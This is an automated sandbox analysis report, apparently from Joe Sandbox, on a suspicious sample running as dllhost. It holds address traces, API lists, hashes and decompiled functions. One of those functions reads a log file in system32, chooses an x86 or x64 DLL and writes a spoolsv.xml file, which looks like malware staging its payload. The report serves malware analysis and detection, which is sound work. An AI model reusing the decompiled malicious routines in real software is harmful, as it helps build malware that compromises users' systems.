                                                0x0287fc1f
                                                0x0287fc21
                                                0x0287fc24
                                                0x0287fc2c
                                                0x0287fc2f
                                                0x0287fc9c
                                                0x0287fc9d
                                                0x0287fca3
                                                0x0287fca5
                                                0x0287fcee
                                                0x0287fcf1
                                                0x0287fcfa
                                                0x0287fcfd
                                                0x0287fd00
                                                0x0287fd02
                                                0x0287fd02
                                                0x0287fd02
                                                0x0287fcf3
                                                0x0287fcf6
                                                0x0287fcf6
                                                0x0287fd07
                                                0x0287fd0a
                                                0x0287fd16
                                                0x0287fd1b
                                                0x0287fd27
                                                0x0287fd31
                                                0x0287fd35
                                                0x0287fd3f
                                                0x0287fd42
                                                0x0287fd4d
                                                0x0287fd52
                                                0x0287fd62
                                                0x0287fd65
                                                0x0287fd69
                                                0x0287fd6a
                                                0x0287fd70
                                                0x0287fd75
                                                0x0287fd78
                                                0x0287fd7a
                                                0x0287fd7c
                                                0x0287fd81
                                                0x0287fd84
                                                0x0287fd86
                                                0x0287fdb0
                                                0x0287fdd4
                                                0x0287fdd8
                                                0x0287fddc
                                                0x0287fdde
                                                0x0287fde2
                                                0x0287fde4
                                                0x0287fdee
                                                0x0287fdf1
                                                0x0287fdf8
                                                0x0287fdf8
                                                0x0287fdf8
                                                0x0287fdf8
                                                0x0287fde2
                                                0x0287fdfd
                                                0x0287fe09
                                                0x0287fe0b
                                                0x0287fe96
                                                0x0287fe96
                                                0x00000000
                                                0x0287fe11
                                                0x0287fe11
                                                0x0287fe15
                                                0x00000000
                                                0x00000000
                                                0x0287fe1a
                                                0x0287fe2c
                                                0x0287fe34
                                                0x0287fe37
                                                0x0287fe38
                                                0x0287fe3b
                                                0x0287fe42
                                                0x0287fe47
                                                0x0287fe4a
                                                0x0287fe7e
                                                0x0287fe88
                                                0x0287fe88
                                                0x0287fe92
                                                0x00000000
                                                0x0287fe92
                                                0x0287fe53
                                                0x0287fe6c
                                                0x0287fe73
                                                0x0287fc96
                                                0x00000000
                                                0x0287fc96
                                                0x0287fe0b
                                                0x0287fd88
                                                0x00000000
                                                0x0287fd54
                                                0x0287fd5b
                                                0x0287fd5e
                                                0x0287fd60
                                                0x0287fd8a
                                                0x0287fd8c
                                                0x00000000
                                                0x0287fd92
                                                0x00000000
                                                0x0287fd60
                                                0x0287fd52
                                                0x0287fcad
                                                0x0287fcb0
                                                0x0287fccb
                                                0x0287fcd0
                                                0x0287fcd6
                                                0x0287fcd8
                                                0x0287fce3
                                                0x0287fce3
                                                0x00000000
                                                0x0287fcd8
                                                0x0287fc31
                                                0x0287fc38
                                                0x0287fc3a
                                                0x0287fc71
                                                0x0287fc71
                                                0x0287fc7b
                                                0x0287fc7e
                                                0x0287fc85
                                                0x0287fc85
                                                0x0287fc85
                                                0x0287fc91
                                                0x00000000
                                                0x0287fc91
                                                0x0287fc3c
                                                0x0287fc40
                                                0x00000000
                                                0x00000000
                                                0x0287fc42
                                                0x0287fc51
                                                0x0287fc56
                                                0x0287fc59
                                                0x0287fc5a
                                                0x0287fc5d
                                                0x0287fc5d
                                                0x0287fc64
                                                0x0287fc66
                                                0x0287fc69
                                                0x0287fc6c
                                                0x0287fc6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0287fbcf
                                                0x0287fbd4
                                                0x0287fbd7
                                                0x0287fbde
                                                0x00000000
                                                0x0287fbde
                                                0x0287fba8
                                                0x0287fbad
                                                0x0287fbb3
                                                0x0287fbb5
                                                0x00000000
                                                0x0287fbba

                                                APIs
                                                  • Part of subcall function 0287F844: CreateFileW.KERNEL32(00000000,00000000,?,0287FC1F,?,?,00000000,?,0287FC1F,00000000,0000000C), ref: 0287F861
                                                • GetLastError.KERNEL32 ref: 0287FC8A
                                                • __dosmaperr.LIBCMT ref: 0287FC91
                                                • GetFileType.KERNEL32(00000000), ref: 0287FC9D
                                                • GetLastError.KERNEL32 ref: 0287FCA7
                                                • __dosmaperr.LIBCMT ref: 0287FCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 0287FCD0
                                                • CloseHandle.KERNEL32(?), ref: 0287FE1A
                                                • GetLastError.KERNEL32 ref: 0287FE4C
                                                • __dosmaperr.LIBCMT ref: 0287FE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 8fde067ca7c4a01635cfbd3c97d5458743af4a0420bbcbfd6afa680f0827c68e
                                                • Instruction ID: c3db19d9b9ba8db8e6e998327f35af2b9fe3ce47fdd13988cc7f5bf3b4680d53
                                                • Opcode Fuzzy Hash: 8fde067ca7c4a01635cfbd3c97d5458743af4a0420bbcbfd6afa680f0827c68e
                                                • Instruction Fuzzy Hash: CEA1533EA141188FDF19DF6CC891BAE3BA1AB06328F180159E915DF3D0DB34D812CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028673E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 158COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E028673E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void _v103188;
				long _v103192;
				void* _v103196;
				signed int _t29;
				void* _t43;
				char* _t44;
				intOrPtr _t51;
				int _t58;
				void* _t69;
				void* _t76;
				intOrPtr _t88;
				void* _t89;
				void* _t95;
				intOrPtr* _t96;
				long _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t101;

				E02883CA0();
				_t29 =  *0x288f008; // 0xe7fe870c
				_v8 = _t29 ^ _t101;
				_t88 = _a4;
				_t69 = __edx;
				_v103196 = 0;
				_v103192 = 0;
				if(E02864E60(__ecx,  &_v103196,  &_v103192) != 0) {
					_push(__esi);
					E02873440(_t88,  &_v528, 0, 0x104);
					E02873440(_t88,  &_v268, 0, 0x104);
					E02865180( &_v528, 0x104, "%s\\x86.dll", _t69);
					E02865180( &_v268, 0x104, "%s\\x64.dll", _t69);
					E02873440(_t88,  &_v103188, 0, 0x19000);
					_t95 = _v103196;
					_t43 = E028676A0(_t95);
					if(_t43 == 0x20) {
						_t44 =  &_v528;
						goto L9;
					} else {
						if(_t43 == 0x40) {
							_t44 =  &_v268;
							L9:
							_push(_t44);
							E02865180( &_v103188, 0x19000,  *0x2896834, _t88);
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							E02873440(_t88,  &_v788, 0, 0x104);
							E02865180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
							_t96 =  &_v103188;
							_t76 = _t96 + 1;
							do {
								_t51 =  *_t96;
								_t96 = _t96 + 1;
							} while (_t51 != 0);
							_v103192 = 0;
							_t97 = _t96 - _t76;
							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
							if(_t89 == 0) {
								goto L6;
							} else {
								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
								_push(_t89);
								if(_t58 != 0) {
									CloseHandle();
									_pop(_t99);
									return E02870A5D(_v8 ^ _t101, _t99);
								} else {
									CloseHandle();
									_pop(_t100);
									return E02870A5D(_v8 ^ _t101, _t100);
								}
							}
						} else {
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							L6:
							_pop(_t98);
							return E02870A5D(_v8 ^ _t101, _t98);
						}
					}
				} else {
					return E02870A5D(_v8 ^ _t101, __esi);
				}
			}


























                                                0x028673e8
                                                0x028673ed
                                                0x028673f4
                                                0x028673f9
                                                0x02867402
                                                0x02867404
                                                0x02867415
                                                0x02867429
                                                0x0286743b
                                                0x0286744a
                                                0x0286745d
                                                0x02867474
                                                0x0286748b
                                                0x0286749e
                                                0x028674a3
                                                0x028674ae
                                                0x028674b6
                                                0x028674e3
                                                0x00000000
                                                0x028674b8
                                                0x028674bb
                                                0x028674db
                                                0x028674e9
                                                0x028674e9
                                                0x028674fd
                                                0x02867507
                                                0x0286750a
                                                0x0286750a
                                                0x0286751e
                                                0x02867535
                                                0x0286753a
                                                0x02867543
                                                0x02867546
                                                0x02867546
                                                0x02867548
                                                0x02867549
                                                0x02867565
                                                0x02867570
                                                0x02867578
                                                0x0286757c
                                                0x00000000
                                                0x02867582
                                                0x02867594
                                                0x0286759a
                                                0x0286759d
                                                0x028675b8
                                                0x028675c3
                                                0x028675d0
                                                0x0286759f
                                                0x0286759f
                                                0x028675a5
                                                0x028675b7
                                                0x028675b7
                                                0x0286759d
                                                0x028674bd
                                                0x028674bf
                                                0x028674c2
                                                0x028674c2
                                                0x028674c8
                                                0x028674c8
                                                0x028674da
                                                0x028674da
                                                0x028674bb
                                                0x0286742b
                                                0x0286743a
                                                0x0286743a

                                                APIs
                                                  • Part of subcall function 02864E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02864E81
                                                  • Part of subcall function 02864E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02864EA1
                                                  • Part of subcall function 02864E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02864EB3
                                                  • Part of subcall function 02864E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864ECF
                                                • LocalFree.KERNEL32(?), ref: 028674C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll
                                                • API String ID: 1503672127-2651032631
                                                • Opcode ID: 1e82ad4afaf6a2225b9ff2e66e2556da4ce7b6a0c05dfcb08a8ad3afec807041
                                                • Instruction ID: c9e995b0ae88ebf69987a84e0a9eb069678ee8ce5f2e5cda0431a74a433ca292
                                                • Opcode Fuzzy Hash: 1e82ad4afaf6a2225b9ff2e66e2556da4ce7b6a0c05dfcb08a8ad3afec807041
                                                • Instruction Fuzzy Hash: C451B8BDA40218ABDB20DB589C49FFDB36DEB44B14F4004E5F519E61C0D774AB948EA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02881A09 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E02881A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __esi;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				short _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				short* _t127;
				signed int _t128;
				short* _t129;

				_t63 =  *0x288f008; // 0xe7fe870c
				_v8 = _t63 ^ _t128;
				_t127 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t127 <= 0) {
					if(_t127 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t127 = E0288002B(_t125, _t127);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E0288002B(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t127 == 0 || _t99 == 0) {
							if(_t127 != _t99) {
								if(_t99 <= 1) {
									if(_t127 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t127 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t127 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t127;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E02877882(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E02883C70();
										_t87 = _t129;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t127 = _a32;
												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t127 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E02877882(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E02883C70();
																_t127 = _t129;
																if(_t127 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E02877DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0287A677(_t127);
													}
												}
											}
										}
									}
								}
								E0287A677(_t100);
							}
						}
					}
				}
				L63:
				return E02870A5D(_v8 ^ _t128, _t127);
			}




































                                                0x02881a11
                                                0x02881a18
                                                0x02881a20
                                                0x02881a23
                                                0x02881a29
                                                0x02881a2c
                                                0x02881a2f
                                                0x02881a33
                                                0x02881a36
                                                0x02881a3b
                                                0x02881a62
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02881a3d
                                                0x02881a45
                                                0x02881a47
                                                0x02881a4b
                                                0x02881a4b
                                                0x02881a50
                                                0x02881a6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02881a52
                                                0x02881a5b
                                                0x02881a70
                                                0x02881a70
                                                0x02881a75
                                                0x02881a7c
                                                0x02881a7f
                                                0x02881a7f
                                                0x02881a84
                                                0x02881a90
                                                0x02881a9d
                                                0x02881aaa
                                                0x02881abd
                                                0x00000000
                                                0x02881abf
                                                0x02881ac1
                                                0x02881af4
                                                0x00000000
                                                0x02881af6
                                                0x02881af8
                                                0x02881afc
                                                0x02881b02
                                                0x02881b05
                                                0x02881b07
                                                0x02881b0a
                                                0x02881b0a
                                                0x02881b0f
                                                0x00000000
                                                0x00000000
                                                0x02881b11
                                                0x02881b15
                                                0x02881b1f
                                                0x02881b24
                                                0x00000000
                                                0x02881b26
                                                0x00000000
                                                0x02881b26
                                                0x02881b24
                                                0x00000000
                                                0x02881b15
                                                0x02881b0a
                                                0x02881b05
                                                0x00000000
                                                0x02881afc
                                                0x02881ac3
                                                0x02881ac5
                                                0x02881ac9
                                                0x02881acf
                                                0x02881ad2
                                                0x02881ad4
                                                0x02881ad4
                                                0x02881ad9
                                                0x00000000
                                                0x00000000
                                                0x02881adb
                                                0x02881adf
                                                0x02881ae9
                                                0x02881aee
                                                0x00000000
                                                0x02881af0
                                                0x00000000
                                                0x02881af0
                                                0x02881aee
                                                0x00000000
                                                0x02881adf
                                                0x02881ad4
                                                0x02881ad2
                                                0x00000000
                                                0x02881ac9
                                                0x02881ac1
                                                0x02881aac
                                                0x02881aac
                                                0x02881aac
                                                0x00000000
                                                0x02881aac
                                                0x02881a9f
                                                0x02881a9f
                                                0x02881aa1
                                                0x02881a92
                                                0x02881a92
                                                0x02881a94
                                                0x02881a94
                                                0x02881b2b
                                                0x02881b2b
                                                0x02881b2b
                                                0x02881b38
                                                0x02881b3e
                                                0x02881b43
                                                0x02881a64
                                                0x02881b49
                                                0x02881b49
                                                0x02881b51
                                                0x02881b55
                                                0x02881bb0
                                                0x02881bb2
                                                0x00000000
                                                0x02881b57
                                                0x02881b5c
                                                0x02881b5e
                                                0x02881b60
                                                0x02881b68
                                                0x02881b8c
                                                0x02881b91
                                                0x02881b96
                                                0x02881b9c
                                                0x00000000
                                                0x02881ba2
                                                0x02881ba2
                                                0x00000000
                                                0x02881ba2
                                                0x02881b6a
                                                0x02881b6c
                                                0x02881b70
                                                0x02881b75
                                                0x02881b77
                                                0x02881b7c
                                                0x02881c91
                                                0x02881c91
                                                0x02881b82
                                                0x02881b82
                                                0x02881ba8
                                                0x02881ba8
                                                0x02881bab
                                                0x02881bb5
                                                0x02881bb7
                                                0x00000000
                                                0x02881bbd
                                                0x02881bc5
                                                0x02881bd3
                                                0x00000000
                                                0x02881bd9
                                                0x02881be2
                                                0x02881be8
                                                0x02881bed
                                                0x00000000
                                                0x02881bf3
                                                0x02881bf3
                                                0x02881bf6
                                                0x02881bfb
                                                0x02881bff
                                                0x02881c4b
                                                0x00000000
                                                0x02881c01
                                                0x02881c06
                                                0x02881c08
                                                0x02881c0a
                                                0x02881c12
                                                0x02881c2f
                                                0x02881c39
                                                0x02881c3b
                                                0x02881c3e
                                                0x00000000
                                                0x02881c40
                                                0x02881c40
                                                0x00000000
                                                0x02881c40
                                                0x02881c14
                                                0x02881c16
                                                0x02881c1a
                                                0x02881c1f
                                                0x02881c23
                                                0x02881c85
                                                0x02881c85
                                                0x02881c25
                                                0x02881c25
                                                0x02881c46
                                                0x02881c46
                                                0x02881c4d
                                                0x02881c4f
                                                0x00000000
                                                0x02881c68
                                                0x02881c68
                                                0x02881c81
                                                0x02881c81
                                                0x02881c4f
                                                0x02881c23
                                                0x02881c12
                                                0x02881c89
                                                0x02881c8e
                                                0x02881bed
                                                0x02881bd3
                                                0x02881bb7
                                                0x02881b7c
                                                0x02881b68
                                                0x02881c95
                                                0x02881c9b
                                                0x02881b43
                                                0x02881a84
                                                0x02881a50
                                                0x02881c9d
                                                0x02881cb0

                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,02881CE2,?,?,?,?,?,?,?,?,?), ref: 02881AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881B38
                                                • __alloca_probe_16.LIBCMT ref: 02881B70
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,02881CE2,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881BCB
                                                • __alloca_probe_16.LIBCMT ref: 02881C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881BE2
                                                  • Part of subcall function 02877882: HeapAlloc.KERNEL32(00000000,77109EB0,00000000,?,02870A9A,77109EB0,?,02869C60,00000100,?,77109EB0), ref: 028778B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881C5E
                                                • __freea.LIBCMT ref: 02881C89
                                                • __freea.LIBCMT ref: 02881C95
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                • String ID:
                                                • API String ID: 3256262068-0
                                                • Opcode ID: 444c5494737ee4474bb4970fdb2a930b1d9d6cca6ebbc16342038abddc137b5a
                                                • Instruction ID: 26b4470f0efbfa1916145e66e2b336d5df42deca487863ed763a72f897029aaf
                                                • Opcode Fuzzy Hash: 444c5494737ee4474bb4970fdb2a930b1d9d6cca6ebbc16342038abddc137b5a
                                                • Instruction Fuzzy Hash: 5B91D67DE002169EEB24AE68CC88AFE7BB6AF05754F144559E90DE7180EF35DC42CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02868BB0 Relevance: 13.7, APIs: 9, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E02868BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct _CRITICAL_SECTION _v56;
				long _v60;
				long _v64;
				void* _v68;
				char _v72;
				long _v76;
				void* __esi;
				signed int _t63;
				signed int _t64;
				void* _t67;
				void* _t75;
				void* _t82;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t100;
				intOrPtr* _t112;
				void* _t113;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t124;
				signed char* _t135;
				intOrPtr* _t139;
				intOrPtr _t142;
				void* _t146;
				struct _CRITICAL_SECTION* _t147;
				signed int _t148;
				void* _t149;
				void* _t150;
				void* _t151;

				_push(0xffffffff);
				_push(E02884728);
				_push( *[fs:0x0]);
				_t150 = _t149 - 0x3c;
				_t63 =  *0x288f008; // 0xe7fe870c
				_t64 = _t63 ^ _t148;
				_v20 = _t64;
				_push(_t64);
				 *[fs:0x0] =  &_v16;
				_t145 = __ecx;
				_t117 = _a12;
				_t142 = _a4;
				_t139 = _a8;
				if(_t117 != 0) {
					__eflags = _t117 - 5;
					if(_t117 != 5) {
						L5:
						E02868690(_t142, _t139, _t117);
						_t67 = E028687A0(_t142);
						__eflags = _t67 - 0xd;
						if(_t67 > 0xd) {
							while(1) {
								_t112 =  *((intOrPtr*)(_t142 + 4));
								_t124 =  &_v28;
								_v28 =  *_t112;
								_v24 =  *((intOrPtr*)(_t112 + 4));
								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
									break;
								}
								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
									break;
								} else {
									_t113 =  *(_t112 + 5);
									_v32 = _t113;
									__eflags = _t113;
									if(_t113 != 0) {
										_t126 = _t142;
										_t75 = E028687A0(_t142);
										__eflags = _t75 - _t113;
										if(_t75 >= _t113) {
											_v76 = 0;
											E02868700(_t126,  &_v28, 5);
											E02868700(_t142,  &_v32, 4);
											E02868700(_t142,  &_v76, 4);
											_t115 = _v32 + 0xfffffff3;
											_push(_t115);
											_t82 = E02870AB4(_t145, __eflags);
											_t151 = _t150 + 4;
											_v32 = _t82;
											E02868700(_t142, _t82, _t115);
											_v72 = 0x288cab8;
											_v60 = 0;
											_v68 = 0;
											_v64 = 0;
											InitializeCriticalSection( &_v56);
											_v8 = 0;
											EnterCriticalSection( &_v56);
											_v64 = _v68;
											E02868840( &_v72, 0x400);
											LeaveCriticalSection( &_v56);
											EnterCriticalSection( &_v56);
											_t90 = _v68;
											__eflags = _t90;
											_t133 =  ==  ? 0 : _v64 - _t90;
											_t92 = E028687B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
											__eflags = _t92 - 0xffffffff;
											if(_t92 != 0xffffffff) {
												E02883DB0(_v64, _v32, _t115);
												_t151 = _t151 + 0xc;
												_t44 =  &_v64;
												 *_t44 = _v64 + _t115;
												__eflags =  *_t44;
											}
											LeaveCriticalSection( &_v56);
											_t135 = _v68;
											_t95 = ( *_t135 & 0x000000ff) - 0x34;
											__eflags = _t95;
											if(_t95 == 0) {
												L16:
												E028688D0(_t145);
											} else {
												__eflags = _t95 == 1;
												if(_t95 == 1) {
													 *(_t145 + 0xc) = _t135[8];
													 *(_t145 + 8) = _t135[4];
													goto L16;
												}
											}
											E02870AAF(_v32);
											_v8 = 0xffffffff;
											_t150 = _t151 + 4;
											_t98 = _v68;
											_v72 = 0x288cab8;
											__eflags = _t98;
											if(_t98 != 0) {
												VirtualFree(_t98, 0, 0x8000);
											}
											DeleteCriticalSection( &_v56);
											_t100 = E028687A0(_t142);
											__eflags = _t100 - 0xd;
											if(_t100 > 0xd) {
												continue;
											} else {
											}
										}
									}
								}
								goto L22;
							}
							_t147 = _t142 + 0x10;
							EnterCriticalSection(_t147);
							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
							E02868840(_t142, 0x400);
							LeaveCriticalSection(_t147);
						}
					} else {
						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
							goto L5;
						} else {
							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
								goto L5;
							}
						}
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
				}
				L22:
				 *[fs:0x0] = _v16;
				_pop(_t146);
				return E02870A5D(_v20 ^ _t148, _t146);
			}








































                                                0x02868bb3
                                                0x02868bb5
                                                0x02868bc0
                                                0x02868bc1
                                                0x02868bc4
                                                0x02868bc9
                                                0x02868bcb
                                                0x02868bd1
                                                0x02868bd5
                                                0x02868bdb
                                                0x02868bdd
                                                0x02868be0
                                                0x02868be3
                                                0x02868be8
                                                0x02868bf6
                                                0x02868bf9
                                                0x02868c15
                                                0x02868c19
                                                0x02868c20
                                                0x02868c25
                                                0x02868c28
                                                0x02868c30
                                                0x02868c30
                                                0x02868c33
                                                0x02868c38
                                                0x02868c3e
                                                0x02868c47
                                                0x02868c49
                                                0x00000000
                                                0x00000000
                                                0x02868c56
                                                0x02868c59
                                                0x00000000
                                                0x02868c5f
                                                0x02868c5f
                                                0x02868c62
                                                0x02868c65
                                                0x02868c67
                                                0x02868c6d
                                                0x02868c6f
                                                0x02868c74
                                                0x02868c76
                                                0x02868c81
                                                0x02868c89
                                                0x02868c96
                                                0x02868ca3
                                                0x02868cab
                                                0x02868cae
                                                0x02868caf
                                                0x02868cb4
                                                0x02868cb7
                                                0x02868cbe
                                                0x02868cc6
                                                0x02868cce
                                                0x02868cd5
                                                0x02868cdc
                                                0x02868ce3
                                                0x02868cec
                                                0x02868cf4
                                                0x02868d05
                                                0x02868d08
                                                0x02868d11
                                                0x02868d1b
                                                0x02868d21
                                                0x02868d2b
                                                0x02868d2d
                                                0x02868d37
                                                0x02868d3c
                                                0x02868d3f
                                                0x02868d48
                                                0x02868d4d
                                                0x02868d50
                                                0x02868d50
                                                0x02868d50
                                                0x02868d50
                                                0x02868d57
                                                0x02868d5d
                                                0x02868d63
                                                0x02868d63
                                                0x02868d66
                                                0x02868d79
                                                0x02868d7b
                                                0x02868d68
                                                0x02868d68
                                                0x02868d6b
                                                0x02868d70
                                                0x02868d76
                                                0x00000000
                                                0x02868d76
                                                0x02868d6b
                                                0x02868d83
                                                0x02868d88
                                                0x02868d8f
                                                0x02868d92
                                                0x02868d95
                                                0x02868d9c
                                                0x02868d9e
                                                0x02868da8
                                                0x02868da8
                                                0x02868db2
                                                0x02868dba
                                                0x02868dbf
                                                0x02868dc2
                                                0x00000000
                                                0x00000000
